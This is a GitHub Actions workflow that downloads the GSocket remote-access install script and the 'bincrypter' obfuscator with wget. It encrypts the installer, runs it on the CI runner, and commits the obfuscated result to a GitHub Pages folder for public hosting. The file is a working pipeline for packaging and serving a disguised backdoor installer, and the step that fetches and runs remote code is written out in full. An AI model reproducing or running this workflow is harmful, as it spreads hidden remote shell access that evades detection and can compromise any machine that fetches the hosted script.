name: Encrypt and Commit GSocket Install Script

on:
  push:
    branches:
      - main
  workflow_dispatch:

permissions:
  contents: write
  pages: write
  id-token: write

concurrency:
  group: "pages"
  cancel-in-progress: true
  
jobs:
  encrypt_and_commit:
    environment:
      name: github-pages
      url: ${{ steps.deployment.outputs.page_url }}
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4
      
      - name: Setup Pages
        uses: actions/configure-pages@v5

      - name: Download GSocket Install Script
        run: wget -O gsocket-install.sh https://gsocket.io/y

      - name: Download BinCrypter
        run: wget -O bincrypter.sh https://raw.githubusercontent.com/hackerschoice/bincrypter/refs/heads/main/bincrypter.sh

      - name: Set execute permissions on BinCrypter
        run: chmod +x bincrypter.sh

      - name: Verify the scripts
        run: md5sum gsocket-install.sh bincrypter.sh

      - name: Encrypt GSocket Install Script
        run: ./bincrypter.sh gsocket-install.sh

      - name: Test run
        run: chmod +x ./gsocket-install.sh && ./gsocket-install.sh        
        
      - name: Move to docs/
        run: mv gsocket-install.sh docs/e

      - name: Commit encrypted script
        run: |
          git config --global user.name "github-actions"
          git config --global user.email "github-actions[bot]@users.noreply.github.com"
          git add docs/e
          git commit -m "Add encrypted gsocket"
          git push
#        env:
#          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
